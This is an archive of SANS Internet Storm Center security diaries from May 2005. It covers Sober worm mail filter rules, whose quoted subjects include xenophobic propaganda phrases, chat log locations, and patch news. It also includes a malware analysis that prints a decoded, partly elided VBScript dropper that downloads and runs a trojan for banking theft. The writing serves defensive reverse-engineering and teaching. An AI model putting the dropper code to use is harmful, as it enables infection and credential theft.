/^Subject:.*Du wirst zum Sklaven gemacht/ HOLD

/^Subject:.*Gegen das Vergessen/ HOLD

/^Subject:.*Graeberschaendung auf bundesdeutsche/ HOLD

/^Subject:.*Hier sind wir Lehrer die einzigen Auslaender/ HOLD

/^Subject:.*Jahre Befreiung/ HOLD

/^Subject:.*Massenhafter Steuerbetrug durch auslaendische/ HOLD

/^Subject:.*Multi\-Kulturell/ HOLD

/^Subject:.*Osteuropaeer durch Fischer-Volmer Erlass/ HOLD

/^Subject:.*Paranoider Deutschenmoerder kommt/ HOLD

/^Subject:.*Polizei schlaegt Alarm/ HOLD

/^Subject:.*Schily ueber Deutschland/ HOLD

/^Subject:.*Transparenz ist das Mindeste/ HOLD

/^Subject:.*Trotz Stellenabbau/ HOLD

/^Subject:.*Tuerkei in die/ HOLD

/^Subject:.*Turkish Tabloid Enrages Germany with Nazi Comparisons/ HOLD

/^Subject:.*Verbrechen der deutschen Frau/ HOLD

/^Subject:.*Volk wird nur zum zahlen/ HOLD

/^Subject:.*Vorbildliche Aktion/ HOLD

/^Subject:.*Whore Lived Like a German/ HOLD

/^Subject:.*wirst ausspioniert/ HOLD

---- end of file contents ------
Eric also has a ready made Spam Assassin set of subject rules to reset the scoring for this virus. As this file is a little long, I would be happy to send it to you on request. But generally, each line takes a subject line from above and transforms it like the following

header SOBER_Q_SUBJ7 Subject =~ /Deutsche Buerger/
describe SOBER_Q_SUBJ7 Subject is from Sober.Q worm
score SOBER_Q_SUBJ7 3.0

-- Updated May 16

Okay. I lied. One more update and I am done.

One of our readers pointed out that the below website has a way to filter Sober-P without relying on the Subject line filters. So here is another option if this things is still spamming into Monday morning work days. Thanks Dirk Mueller for this.


Academia Security Awareness

Alas some piece and quiet has arrived on my university Campus. The ResNet is effectively empty for a few weeks until our first summer session. So despite the virus/spam junk from this morning/last night, I am looking forward to what we can do better on my campus.

For those of us that work in a sometimes more challenging environment, now is the time to start developing a strategy of how to deal better with the return of infected student computers this fall.

On my campus, I know that we have a small list of things we need to do better.
1) Push students to install patches and current AntiVirus software.

2) Spyware prevention measures (for us this is going to be a part of our new AV version used on campus).

3) Local password complexity problems. (I think this is the root of my botnet activity recently)

4) Better way of notifying students about security events on campus. ***
So to those in academia, "What appears to be your biggest problems you believe need to be addressed before the fall semester?", "What ideas do you have on communicating to your students effectively about security?", and "What can you do to push the students into a better security posture the day they arrive on campus?". If you have ideas, please send them to sfendley _at_ isc.sans.org .

I will be compiling the answers over the next week for a report to all next week.
*** It is amazing to me that students refuse to read information coming to them via email from campus administration, or through the student newspaper. But sidewalk chalking still appears to be the preferred method by the students. I am still unsure about how well students really pay attention to closed circuit announcement TV system.


Published: 2005-05-14

Chat Logs Location; Microsoft Security Advisories

Chat Logs Location

Regarding the location of the various IM logs requested , several readers have responded. Below summarize some of the log location gathered:

MSN Messenger 7.0: C:\Documents and Settings\<windows login>\My Documents\My Received Files\<IM handle>\History

Yahoo Messenger 6.0: C:\Program Files\Yahoo!\Messenger\Profiles\<IM handle>\Archive\Messages

AOL Messenger: C:\program files\users\default\log\AIM\Query

Miranda Messenger: C:\Program Files\Miranda IM\Logs

mIRC: C:\program files\mirc\logs (if enabled)

Trillian 3.1: C:\Program Files\Trillian\users\default\logs

Exodus 0.9.x: C:\Documents and Settings\<username>\My Documents\Exodus-Logs\<user>_<server>.html

GAIM: On unix, they are in ~/.gaim/logs, on win32 they are in the $drive\Documents and Settings\user\Application Data\.gaim\logs directory. In either case, new logs (new as of 0.73) are in subdirectories that correspond to protocol/yourscreenname/theirscreenname.

iChat: /Users/<logon name>/Documents/iChats

Microsoft Security Advisories

Microsoft recently has started a pilot program of issuing Microsoft Security Advisories, which aims to provide guidance and information about security-related software changes or software updates. This is not the same as the Security Bulletin which published on a monthly basis. The security advisories aim to provide timely information which may release within one business day when Microsoft is notified of an issue.

For those concern on the security of Microsoft products, this is another place you should not miss.

You can read the details at:


Published: 2005-05-13

Thanks for info on chat monitoring; PanadaLabs report; Hyper-Threading vulnerability

It has been a relative quiet black Friday. We have received a lot of help and valuable feedback on how to capture chat logs. Thanks a lot to those who have contributed.

PandaLabs quarterly report

PandaLabs has written a quarterly report on the malware trend and analysis from January to March 2005. It is an excellent read for all to understand the risk we are dealing with on the Internet these days.


Information lead vulnerability on processors with Hyper-Threading

A few readers wrote in today about a vulnerability on processors with Hyper-Threading technology. Due to sharing of resources between thread, a malicious thread (eg. Trojan) can monitor other threads that are executing on the same machine and retrieve sensitive information (eg. encryption key)


Handler on Duty

Jaon Lam

jason /at/ networksec.org


Published: 2005-05-12

Firefox 1.0.4; DNSSEC Tools; Phisher's benefit use Google link; Viewing Chat Logs; Web Browser Forensics; Gecko Based Browers HTTP Authentication Prompt Vulnerability

Firefox 1.0.4 Released.

Firefox 1.0.4 released with fixed remote code execution of Javascript and DHTML errors.

For more information http://www.mozilla.org/products/firefox/releases/1.0.4.html


The Project released their fist alpha version. Following theor web site, the project is helping ease the deployment of DNSSEC related technologies.

What benefits use Google link for Phisher.

We've seen the phisher use Google link when they send phishing scam. We thought the benefits are free redirect and url filter avoidance. Whatelse phisher have benefits? If you have any information or idea, please use our contact form at
http://isc.sans.org/contact.php to send them to use.

Comments from Jozef Hatala, It prevents SpamCop from filing a complaint with the actual ISP hosting the phisher's website.

Viewing Chat Logs.

We were asked today to assist a concerned parent in finding chat logs on a child's computer. We believe that many of our readers may already be doing this and solicit your ideas and comments. We plan to publish a short (two to three pages) guide for parents and school administrators on how to look for chat logs, and are looking for the specific locations of AIM, ICQ, MSN, etc. chat clients plus any other tips that you might have to offer. Use our contact form at
http://isc.sans.org/contact.php to send them to us.

Here are some of chat log location.

MSN Messenger 7.0 : C:\Documents and Settings\<windows login>\My Documents\My Received Files\<IM handle>\History

Yahoo Messenger 6.0 : C:\Program Files\Yahoo!\Messenger\Profiles\<IM handle>\Archive\Messages

AOL Messenger : C:\program files\users\default\log\AIM\Query

Miranda Messenger :C:\Program Files\Miranda IM\Logs

Web Browser Forensics.

The securityfoucus update Web Browser Forensics article. , the document introduce tools and techniques to reconstruct files cached by Mozill Firebox browsers. The one of tool called is support Cache View for Netscape Navigator, Mozilla, Opera and IE caches.

Gecko Based Browers HTTP Authentication Prompt Vulnerability.



Handler on Duty

Kevin Hong (khong-at-kisa.or.kr)


Published: 2005-05-11

SANS/ISC Webcast; MS05-017 Exploit; They're Baaaaaack...; Follow the Bouncing Malware : A Fresh Bounce (Updated: 22:30 GMT)

Note: Viewing this diary may very well set off your antivirus software. If it does: tough. Nothing in here is Evil (at least in the incarnation that it appears here.) If you write me to tell me that it set off your AV, I’ll quite possibly write back and make fun of you. You’ve been warned.

SANS/ISC Webcast Today

Be there... Aloha.

MS05-017 Exploit

An exploit for MS05-017 (that place-holder "0" in front of the 17 inspires confidence, doesn't it?) is now available as part of the Metasploit Framework, so if you aren't patched... well, why aren't you?

MS05-017 (Vulnerability in Message Queuing Could Allow Code Execution / CAN-2005-0059 / KB892944) was part of Microsoft's April 2005 release and more information can be found here;.
I've not had a chance to test this yet, but H.D. is pretty amazing, so I don't have much question that it works.

They're Baaaaaaaaaaaaaack....

Rumor has it that Microsoft will re-release the MS05-019 security update in June, 2005 correcting their removal of raw sockets...

Follow the Bouncing Malware: A Fresh Bounce

Well, some people have pointed out that it’s been quite some time since I last posted a “Follow the Bouncing Malware” installment and... well... due to the overwhelming demand (thanks Mom...) here we are.

I thought I would take a look at something more recent - something that might have landed in your inbox sometime over the past couple of weeks, and so I’ve subtitled this journey: A Fresh Bounce.

Disclaimer: None of the links in the following account are “clickable”. There is a very good reason for that. If I make the links clickable, some yahoo out there will click them. If you insist on playing with these sites you’ll need to at the very least, cut and paste to do it. If you infect your machine, don’t even think of blaming me. If you write me to tell me that you infected yourself, I’ll quite possibly write back and make fun of you. You’ve been warned.

Just the other day, I received the following urgent message via a mailing list address at incidents.org. Poor li’l Sasha was obviously in need of some help:

Delivered-To: xxxxxxxxxxx@gmail.com
From: Sasha NOBLE <xxxxxxxxxxx@roxette.org>
To: xxxxxxx@incidents.org
Subject: Help me
Date: Wed, 04 May 2005 11:15:39 +0000

Hello, Lucas! some help sunburned normal. how ray backbit me violently?
repeatedly position wrought my east except blood. i overrode a boiling
dad beyond science. kindly. their tight spring under office, which sneaked
future, elastic current. Norman felt that stiff list. i drew Marlen who
ridded me Jabari! she dug elastic arm, that interbred foolishly... beyond
interest dowed tin, authority withdrew above the expert toward sad boat:
you misread her ready decision aboard our special expansion, who laid
wearily. a bright balance swam considering our idea; elastic, angry wall.
black drink sock cost, he hoised yearly, deliberately, tenderly. this good
brass came from his offer; rough, possible paper. he wound your future
dress for the private chief, which miscast exactly. she gave him separate.
i outputted clear surprise, which misunderstood obnoxiously... bent the
general play,


Ok... Maybe it was Jude who was in need of help... Or Lucas.... or Norman... or Marlin... or... Jabari...

But I digress...

Suffice to say that someone, somewhere, was in urgent need of my help. And a grammar checker.

How could I possibly ignore their plea?

Well, if I were like most of the rest of you heartless swine, I would simply click the “delete” button on Outlook. But, to quote the Kink^Hg of Pop in a distant yet eerily prescient incarnation of himself, “I’m not like the other guys...” and so I started to click the delete button in Thunderbird.

But I couldn’t bring myself to do it.

The dang batteries on my cordless mouse chose that moment to go dead.

Having had far too little sleep, and far too much caffeine, I seized on this as some sort of sign, (I have a tendency to do that... sometime I’ll tell you the story of the Twinkie that, for several months, I believed was the reincarnation of my recently deceased cat...) and decided to swap in some fresh double-A’s and investigate what might be troubling Sasha/Jude/Lucas/Norman/Marlin/Jabari (hereinafter referred to as SJLNMJ).

Disjointed thoughts and poor punctuation were the least of SJLNMJ’s issues. There was Evil lurking in this message: HTML.

Email messages are supposed to be text, thank you. Text. Only text. If God had intended for email to be written in HTML, then the traditional signoff of prayers would be </amen>.

But, I digress...

While the text portion of SJLNMJ’s message reads like James Joyce on crack, perhaps a review of the HTML portion of SJLNMJ’s message would make things clearer:

Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit

<HTML> <BODY> <FONT face="Verdana, Arial"> Hello, Lucas!
some help sunburned normal. how ray backbit me violently? repeatedly
position wrought my east except blood. i overrode a boiling dad beyond
science. kindly. their tight spring under office, which sneaked future,
elastic current. Norman felt that stiff list. i drew Marlen who ridded
me Jabari! she dug elastic arm, that interbred foolishly... beyond
interest dowed tin, authority withdrew above the expert toward sad boat:
you misread her ready decision aboard our special expansion, who laid
wearily. a bright balance swam considering our idea; elastic, angry
wall. black drink sock cost, he hoised yearly, deliberately, tenderly.
this good brass came from his offer; rough, possible paper. he wound
your future dress for the private chief, which miscast exactly. she gave
him separate. i outputted clear surprise, which misunderstood
bent the general play,

<img width=50 height=100 style="display:none"><div

Ah! That’s so much clearer. (Okay... I lied. It’s still gibberish.)

Hey! What’s that at the end? An OBJECT tag! Oooo! How fun!

Let’s see where it leads!

(Note: I said “let’s,” but face it, I really didn’t mean it. Remember: Don’t even think about trying this yourself, boys and girls. You stay here... I’ll go in first...)

(Note #2: I’m talking to you, Mr. “I Know What I’m Doing.” Don’t try it.)

Grabbing the results of that PHP script with the parameter “action=click,” gives us the following:

<HTML><HEAD><TITLE>Universal Plugin pre-Installer</TITLE>
APPLICATIONNAME="Plugin pre-Installer"
<OBJECT id="MSplay" classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B">
<SCRIPT language="VBScript">
If InStr(EP,"cgi-bin")<>0 Then
CGIP=EP & "pscounter.cgi"
CGIP=EP & "cgi-bin/gen/pscounter.cgi"
End If
IP= CGIP & "?action=install"
Set oSA = CreateObject("Shell.Application")
On Error Resume Next
oSA.ShellExecute "mshta",IP
If Err.number <> 0 Then
Cmd="mshta " & IP
MSplay.Run (Cmd),1,FALSE
End If

Now I’ve never claimed to be a JavaScript guru (why would anyone claim such a thing publicly?) but it seems pretty obvious that this little gem is intended to take us right back where we came from but using the parameter “action=install” this time.

And so, with reckless abandon, complete disregard for personal safety, and a 20 oz Mountain Dew, I returned to the Russian oil bank, lookin’ for a little action... uh... equals install:

(Remember... I’m 10’ tall and bulletproof. You’re not. Don’t try this at home.)

<HTML><HEAD><TITLE>Universal Plugin pre-Installer</TITLE>
APPLICATIONNAME="Plugin Installer"
<OBJECT id="MSplay" classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B">
<OBJECT id="MSmedia" classid="clsid:0D43FE01-F093-11CF-8940-00A0C9054228">
0t$0#%CPEZ+#TDSJQU? gvodujpo
Em(Sq-Mo-St-emm*|usz+#tBY>voftdbqf(%52EPEC%3fTusfbn*<wbs pT>ofx

<quite literally, TONS of gibberish deleted>";

l='\0\t\n\r-­ !"#$%&\'()*+,-./0123456789:;<=>?@
for (i=0;i<d.length;i++){b=d.charAt(i);a=l.indexOf(b);if (a==1) a=9;if
(a==2) a=10;if (a==3) a=13;if (a==4) a=34;if (a<=31 &
if (a>0){ if (a>=41) a=a-1; s=s+l.charAt(a);} else

Dang... It looks like a dictionary threw up. (Note: The above is an inexact replica of the actual file that I downloaded. Some of the characters in the original can’t be displayed properly in the diary. Sorry ‘bout that.)

And now, dear reader, I’m going to let you in on a little secret. Please understand though that what I’m about to tell you must remain absolutely confidential... it’s super top secret: All of that stuff up there...

...it’s encoded.

Somebody has written some stuff that THEY DON’T WANT US TO SEE.

Shhhh... don’t tell anyone.

Ok. So perhaps that was... well... blatantly obvious.

But what isn’t obvious is how we’re going to deal with this stuff. Get ready boys and girls, ‘cause kindly ol’ Dr. Tom is gonna take you on a trip down Reverse Engineering Lane and hopefully teach you a thing or three about how to deal with this kind of code obfuscation all on your own.

Now, many years ago, back when I was younger, dumber, and more energetic, I would have banged together some perl code to try to make some sense out of that wad of characters. Time has mellowed me, however, and I’ve come to understand that youthful energy and enthusiasm can nearly always get the daylights kicked out of it by the lazy deviousness that comes with age. “Why work harder when you can work smarter?” and several other clichés of that ilk come to mind. I’ve come to a place in my life now, where I can cause my adversary to use his own skills against himself, much like Road Runner always does to Wiley Coyote. (I bet you thought I was going to go for some Zen/Kung Fu reference, didn’t you...)

Disregarding the “data” in the above JavaScript, a quick look at the actual functional portion reveals some interesting things. The code will decode the data and write it into a live HTML document using that “document.writeln()” call. That “document” will then execute and, presumably, do something... probably something Bad. But... what if we could co-opt that process and use it to show us the decoded document?

It turns out that it’s not too difficult to accomplish that.

Because JavaScript has far more capabilities when run from your local machine than it ever does when run from a website, we’ll use that difference to our advantage. By inserting a call to an ActiveX component, we can actually open a file on our test machine. We’ll then make a slight alteration to the original script function, and we’ll be able to use the script itself to write out the decoded content.

Whoa... it almost sounds like I know what I’m talking about, doesn’t it?

Before I continue, please note: Never, EVER do this on a production machine. Never do this on a machine that will be used for anything else. Never do this on any machine connected to the network. Never do this on a machine you’re not prepared to format and reinstall. Never, EVER, spit into the wind.


So... we’re going to stick the following snippet into the JavaScript up near the beginning, right after the <SCRIPT LANGUAGE="JavaScript"> line:

var fso, output; 
fso = new ActiveXObject("Scripting.FileSystemObject");
output = fso.OpenTextFile("C:\\test.txt" , 8, 1, -2);

Then, we’re going to change the “document.writeln()” function call at the end of the code to be a call to “output.write()”

Why? Well, that first snippet will create a FileSystemObject which it then uses to open a file called “test.txt” on the root of our C: drive. The “handle” to the output file is called, conveniently enough, “output.” We then change the call from document.writeln() to a call to output.write() and anything that was going to be written into the live HTML document will now go into our output file.

We then fire the newly edited script off in InternetExplorer on a convenient sacrificial box and lo! We find the decoded output in C:\test.txt.

Now someone, somewhere, spent a great deal of time thinking up that whole “encoding” scheme. Several hours were spent, huddled over a keyboard creating the functions to both encode and decode that gibberish, and we just blew it all away with about two minutes work. As you can see, it didn’t really “hide” much of anything from us... Perhaps that anonymous programmer’s time would have been better spent taking... say... an ethics class...

Looking for a real job...

Learning to program in a real language...

But I digress...

The output in my “test.txt” file looked like this:

<TEXTAREA id="Main_HTA">
function Dl(Rp,Ln,Rs,dll)
var oS=new ActiveXObject(sAX);
var oX=new ActiveXObject("Microsoft.XMLHTTP");
var XB=oX.responseBody;
var oA=new ActiveXObject("Shell.Application");
if (dll==0)
Cmd=Ln+" "+Rs;
<IFRAME name="icounter" src="about:blank" width=10 height=10></IFRAME>
<SCRIPT language="VBScript">
ssfDESKTOP = 0
ssfWINDOWS = 36
ssfSYSTEM = 37
Dim oShellApp
Dim oFolder
Dim oFolderItem
Dim PluginFile
Dim WinDir
Dim EnvStrings
Dim Font_Path_Components
Dim XMLBody
Dim cByte
Dim ByteCode
Dim Main_HTA_Body
Dim Cmd_Params
Dim Module_Path
Dim Trojan_Path
Dim IntervalID
Dim nCmdCalled
If InStr(Exploit_Path,"cgi-bin")<>0 Then
CGI_Script_Path=Exploit_Path & "pscounter.cgi"
CGI_Script_Path=Exploit_Path & "cgi-bin/gen/pscounter.cgi"
End If
document.frames(0).location.href = CGI_Script_Path & "?action=finish"
self.MoveTo 6000,6000
ExeName=ExeName & ".exe"
DllName=DllName & ".dll"
HTAName=HTAName & ".hta"
Set oShellApp = CreateObject("Shell.Application")
Set oFolder = oShellApp.NameSpace(ssfFONTS)
Set oFolderItem=oFolder.ParseName("Symbol.ttf")
WinDir= Font_Path_Components(0) & "\" & Font_Path_Components(1) & "\"
ExeName=WinDir & ExeName
DllName=WinDir & DllName
HTAName=WinDir & HTAName
On Error Resume Next
Set oFolderItem = oFolder.ParseName("Symbolw.ttf")
If Err.number <> 0 Then
Call Run_Installer
If LinkPath="" Then
Call Run_Installer
End If
End If
setTimeout "HangUp()",9000
Sub Run_Installer
Download_Call="Dl('" & Trojan_Path & "'" & "," & "'" & ExeName & "'" &
"," & "'',0);"
Main_HTA_Body= Main_HTA_Body & Download_Call
Main_HTA_Body= Main_HTA_Body & "self.close();</SCR" & "IPT></BODY>"
' Prepare the string that will be passed to cmd.exe
Select Case WinOS
Case "NT"
Call Download_and_Execute(Trojan_Path,ExeName,"",0)
Cmd_Params="cmd /c copy " & TestName & " " & xTestName
MSplay.Run (Cmd_Params),1,FALSE
Case "2K"
' Create an additional HTA file (can't be greater than 1000 bytes)
Cmd_Params="/c echo " & Main_HTA_Body & " > " & HTAName
oShellApp.ShellExecute "cmd",Cmd_Params,"open"
oShellApp.ShellExecute "mshta",HTAName
Cmd_Params="/c copy " & TestName & " " & xTestName
oShellApp.ShellExecute "cmd", Cmd_Params
Cmd_Params="/c del " & HTAName
Case "XP"
' Create an additional HTA file (can't be greater than 1000 bytes)
Cmd_Params="/c echo " & Main_HTA_Body & " > " & HTAName
oShellApp.ShellExecute "cmd",Cmd_Params,"open"
oShellApp.ShellExecute "mshta",HTAName
Cmd_Params="/c copy " & TestName & " " & xTestName
oShellApp.ShellExecute "cmd", Cmd_Params
Cmd_Params="/c del " & HTAName
Case Else
Call Download_and_Execute(Trojan_Path,ExeName,"",0)
Cmd_Params="command /c copy " & TestName & " " & xTestName
MSplay.Run (Cmd_Params),1,FALSE
End Select
End Sub

Sub Download_and_Execute(Remote_path,Local_name,Run_params,Run_by_Rundll32)

set oXMLHTTP = CreateObject("Microsoft.XMLHTTP")
If GetStatus=0 Then
Set PluginFile=MSmedia.CreateTextFile(Local_name, TRUE)
For j=1 To Plugin_size
If Run_by_Rundll32 = 0 Then
Cmd=Local_name & " " & Run_params
Cmd="rundll32" & " " & Local_name & Run_params
End If
On Error Resume Next
MSplay.Run (Cmd),1,FALSE
End If
set oXMLHTTP=Nothing
End Sub

Function HangUp()
End Function

Function Delete_HTA(params)
If nCmdCalled<4 Then
oShellApp.ShellExecute "cmd",params
End If
End Function

Function Get_Win_Version()
If InStr(IEversion,"Windows 95") <> 0 Then
ElseIf InStr(IEversion,"Windows NT 4") <> 0 Then
ElseIf InStr(IEversion,"Win 9x 4.9") <> 0 Then
ElseIf InStr(IEversion,"Windows 98") <> 0 Then
ElseIf InStr(IEversion,"Windows NT 5.0") <> 0 Then
ElseIf InStr(IEversion,"Windows NT 5.1") <> 0 Then
End If
End Function

Function WriteFile
End Function

Function GetFile
On Error Resume Next
If Err.number <> 0 Then
End If
End Function

Function OpenSession
Req_type="G" & "E" & "T"
End Function

Function GenerateName()
Loop While ik<rr
End Function

Function InitPaths
End Function


Well now. Ain’t that purty? I really do appreciate the way that they’re not even attempting to rationalize what they’re doing... with variable names like “Trojan_Path,” staring you in the face, it’s sorta’ hard to keep up the charade that you’re writing an app for “market research.”

Speaking of “Trojan_Path” let’s see what we find at the other end...

The file divx.exe is a Win32 executable, 21,536 bytes long. Taking a quick look at the file reveals that it has been packed with FSG and has a really mangled PE header and a tiny, really whacked MZ header. Once again, someone is trying to hide something...

Packed / obfuscated executables are nothing more than an annoyance. They don’t stand up to a determined effort to unpack them because, like the “encoding” we just blew away, packed executables always carry the keys to the kingdom along with them. Generally with a little coaxing, they give up their secrets. FSG is no exception, and with a bit of effort, I was able to unpack the divx.exe executable. When I did, I found all sorts of interesting stuff...

When executed, divx.exe copies itself to the windows\system32 folder under the name winldra.exe installs a key to launch itself in HKLM\Software\Microsoft\Windows\CurrentVersion\Run and dumps several DLL files in the system32 folder. These DLL files are used by the executable to latch itself into the Windows CBTProc hook, a rather dubious “feature” of the operating system that was intended to be used by Computer Based Training programs to monitor what’s going on in the active window. According to Microsoft, “The system calls this function before activating, creating, destroying, minimizing, maximizing, moving, or sizing a window; before completing a system command; before removing a mouse or keyboard event from the system message queue; before setting the keyboard focus; or before synchronizing with the system message queue. A computer-based training (CBT) application uses this hook procedure to receive useful notifications from the system.”

“Useful notifications”...


Pretty darned useful, if you’re a virus.

With that viewpoint, the program watches for access to several banking sites:


There are also some shenanigans done with several citibank.de hosts, but I’m not entirely sure how that works...

Ever helpful, the program then corrects any math errors the user may make while using the site.

(Just checking to see if you were still paying attention...)

It actually captures text within any browser session associated with one of those sites saving it in a file and sending it off via email. Then, in a fit of pique and poor grammar, it commemorates the occasion with a registry entry:

HKCU\Software\SARS\mailsended = 1

Really nice, eh?

It also takes the, now passé, step of diddling with the user’s hosts file and routing a large list of antivirus vendor sites to the loopback address.

FYI: When I first started playing with this chunk o' malware I sent it off to all of the major AV vendors and it should currently be identified by their signature files. Attempts were made to get the offending sites shut down as well.

So after all of that, I suddenly find myself re-thinking the whole “good Samaritan” thing where ol’ SJLNMJ is concerned. Yes, SJLNMJ needed help alright... he/she/they/it needed help to the funds in my online bank account (of which I have none...)

I’ve learned my lesson - helping others is bad. The crooks and thieves of this world rely on and use our better natures against us. You won’t catch me making THAT mistake again...

Hey! Lookie here! There’s this dude in Nigeria that has to find a way to get $50,000,000 US out of the country... all he needs is a little help.


Handler on Duty

Tom Liston - Intelguardians Network Intelligence, LLC - tom at intelguardians dot com


Published: 2005-05-10

MSFT Patches / DrudgeReport headline - ...huge computer attack...

Note: I'm updating the current (2005-5-11) Diary. It'll be back in a bit -TL

MSFT Patches

We are waiting for the release of MSFT Patches to post more details here. As already pointed in the advance bulletin, we should expect 1 patch rated as Important.


MSFT Patches are out.

As described in the previous statement, there is 1 patch in this release.

This one is the MS05-024, and will affect only Windows 2000 with SP3 and SP4.

Windows 98, 98SE or ME? Hummm, MSFT has a surprise for you...:)..."Microsoft Windows 98, Microsoft Windows 98 Second Edition (SE), and Microsoft Windows Millennium Edition (ME) – Review the FAQ section of this bulletin for details about these operating systems."...Which is: "Are Windows 98, Windows 98 Second Edition, or Windows Millennium Edition critically affected by one or more of the vulnerabilities that are addressed in this security bulletin?

No. Although Windows Millennium Edition does contain the affected component, the vulnerability is not critical."...no Patches for you, baby...

The MS05-024 bulletin refers to a "Vulnerability in Web View Could Allow Remote Code Execution (894320)".

Although it has an Impact of Remote Code execution, it is rated as Important. In Microsoft severity rating, Critical is "A vulnerability whose exploitation could allow the propagation of an Internet worm without user action.".

According the advisory, there is a problem in the way Windows Explorer "handles certain HTML characters in preview fields.". A typical attack scenario is on the workaround section: "In a Web-based attack scenario, an attacker would have to host a Web site that contains a Web page that is used to exploit this vulnerability." "...an attacker would have to persuade them to visit the Web site, typically by getting them to click a link that takes them to the attacker's Web site. After they click the link, they would be prompted to perform an action. An attack could only occur after they performed these actions."

Our good reader Juha-Matti wrote that this Microsoft patch will fix the flaw, published only five months ago, at http://www.greymagic.com/security/advisories/gm015-ie/ , discovered by Grey Magic Software with a Bugtraq ID 13248. Good Work!
#include <sarcasm.h>

The Malicious Software Removal Tool was also updated today. The url to check it is at http://www.microsoft.com/security/malwareremove/default.mspx .

More information about MS05-024:

DrudgeReport Headline - "...huge computer attack..."

We are receiving a lot of questions regarding a headline posted at the . If you didn't read it yet, the headline is: "FEDS INVESTIGATE HUGE COMPUTER ATTACK; WORLDWIDE HUNT FOR 'STAKKATO'". The link actually points to a New York Times report.

Other link to the same history.

We are still trying to get more details to post here, but one thing that must be noticed is that it is not only the Defense Department but also Cisco and a few others that are involved.


Handler on Duty: Pedro Bueno (pbueno/AT/isc.sans.org)


Published: 2005-05-09

IPsec vulnerability and more public Ethereal exploits!

IPSec vuln announced

NISCC has posted an advisory for IPSEC implementations. Seems that any configuration of IPSec that uses ESP, IP protocol 50 (Encapsulating Security Payload), with confidentiality (encryption) only is affected. In addition, reports of some configurations of AH (Authentication Header), IP protocol 51 are also affected.

The impact of this vulnerability is huge (well, assuming that you arent using data integrity already), as the attacker could get the plaintext version of the communication. As was pointed out to me by an ISC reader, the default on most VPN servers is to include data integrity with ESP. This is one good case where most people probably dont stray too far from the default config *sic*.

Principal workaround: Ensure that you use ESP with integrity protection.

Link: http://www.niscc.gov.uk/niscc/docs/al-20050509-00386.html?lang=en

More Ethereal exploits made public

Ethereal is a fantastically useful tool to the network analyst. It can decode over 460 protocols, including Quake III Team Arena gaming protocol!!! Now for the downside. Writing protocol parsers is not an easy task. Its ok to interpret how a packet is "supposed" to look. What about the edge cases? What about failing gracefully? This is where alot of the protocol parsers are failing us.

Recently I was speaking with the venerable godfather of "those_who_wear_tin_foil_hats", Ed Skoudis, about a very scary concept: IDS killer packets. The idea is that you kill whatever monitoring tools might be on the network first, then you install the malicious code and take over the box.

This past year we have seen dozens of Ethereal vulnerabilities (both DOS and exploitable), a few Tcpdump denial of service vulns, and of course the biggies: buffer overflow and DOS in Snort, and a worm (Witty) that whacked ISS intrusion detection software. In fact, the Witty worm exploited a vulnerability in the Protocol Analysis Module for ICQ (yes, another protocol parser bug).

The point is not to harp on the developers, we know its not easy to get right. The point is that we all need to take extra care in patching our security infrastructure.

Today, two new exploits for Ethereal were made public. Ethereal 0.10.11 is apparently not vulnerable to these.

Mike Poor


Handler on Duty - signing out

./mike &


Published: 2005-05-08

Firefox 1.0.3 Alternate Workaround; OhMyGodGoogleIsGone!, Update: IPSec vuln announced

Firefox 1.0.3 Alternate Workaround

Thanks to VMM for pointing out that an alternate (and perhaps better) workaround for the recently announced remote code execution flaw in Firefox 1.0.3 is to disable “remote software installation,” rather than disabling all Javascript. In the Win32 version of Firefox, this is accomplished by:

Tools | Options | Web Features | and clearing the “Allow web sites to install software" checkbox.

Two Notes:

1) There is some question as to the availability of this setting in Firefox on platforms other than Windows... YMMV.

2) While this seems like a reasonable workaround, it has not been tested.


A few weeks back, when we reported some fairly widespread incidents of DNS Cache poisoning, we had quite a few people claiming that we were full of beans. Eventually, as we were able to piece together the full picture, we were proven right. (And, try as I may, I can’t recall receiving an apology from any of the folks who said we didn’t know what we were talking about...)

Flash forward to Google’s recent outage, and suddenly “DNS Cache Poisoning” is the first word on everyone’s lips.

Sometimes I think the communal-mind created by the entire online community wears big, fuzzy, pink slippers, lives in a double-wide, and has a lifetime subscription to the Weekly World News.

Of course, we all know that nothing on the Internet is ever as it seems...

Google went bye-bye for 15 minutes. Or perhaps it was an hour. It depends on who you ask... (or how long your DNS server cached the bogus information).

This is, of course, one of several signs that Nostradamus predicted would signal the end days.

And while several people were quick to expound theories about what caused the outage, we prefer to stick with the simplest explanation (which is also what Google is saying...): it was a DNS issue. Somebody in charge of Google’s DNS did something dumb.

It fits the facts as we have heard them (“google.com” unavailable, but still reachable if you used the IP address).

But what of the mysterious “redirects” to other search pages? Yesterday we reported that readers were seeing some suspicious “redirects” to an alternate search engine called “SoGoSearch.” It turns out that “SoGoSearch” owns the domain name “com.net,” and the machines “www.google.com.net” and “google.com.net” lead you to their search engine. So... if an overzealous browser tried to “fix” an unavailable “google.com,” it’s quite likely that you could end up looking at the SoGo search engine.

As an aside: The fact that you can do a WHOIS lookup and find a listing showing:


doesn’t mean that the entire DNS system has been compromised. It simply means that someone with far too much time on their hands registered their nameserver with that goofy name.

Such childish stunts are widely acknowledged to increase your attractiveness to the opposite sex. Failing that, you can always slip on your big, fuzzy, pink slippers and spend your nights reading the Weekly World News.


Handler on duty : Tom Liston - tom at intelguardians dot com


Published: 2005-05-07

Google Web Accelerator continued; phpBB 2.0.15 released; Backdoors more popular than Viruses?; Anti-Spyware poll results; Google.com DNS glitch; SQL server 2000 SP4

Final Edition

Google Web Accelerator continued

For a Saturday, we got quite some feedback on item about the new Google's Web Accelerator.

On one end of the story we see reactions that both trust Google to do the right thing due to their "do no evil" motto, as well as comparing them to Microsoft's new retrieval system for documents in case of application crashes.

The other end of the story sends us comments of other projects involving web caches such as
- "poor man akamai" solutions such as
, a network of proxy caches.

- solutions that also check contents of ssl protected http traffic (https). This latter is obviously not appreciated from a security viewpoint. Richard pointed out what's probably the most nasty one of this category. While they don't want to be called spyware, have a look at an excerpt from their description at
http://www.marketscore.com/privacy.aspx : "Once you install our application, it monitors all of the Internet behavior that occurs on the computer on which you install the application, including both your normal web browsing and the activity that you undertake during secure sessions, such as filling a shopping basket, completing an application form or checking your online accounts, which may include personal financial or health information."

Personally I don't believe much in caches, on one side because they don't gain enough bandwidth to be worth their trouble, on the other end because of all the complications they create. Worse unless you have a slow link in the path to the destination server there's nearly no measurable gain in performance as the bottleneck usually is the browser's capability to render pages fast enough.

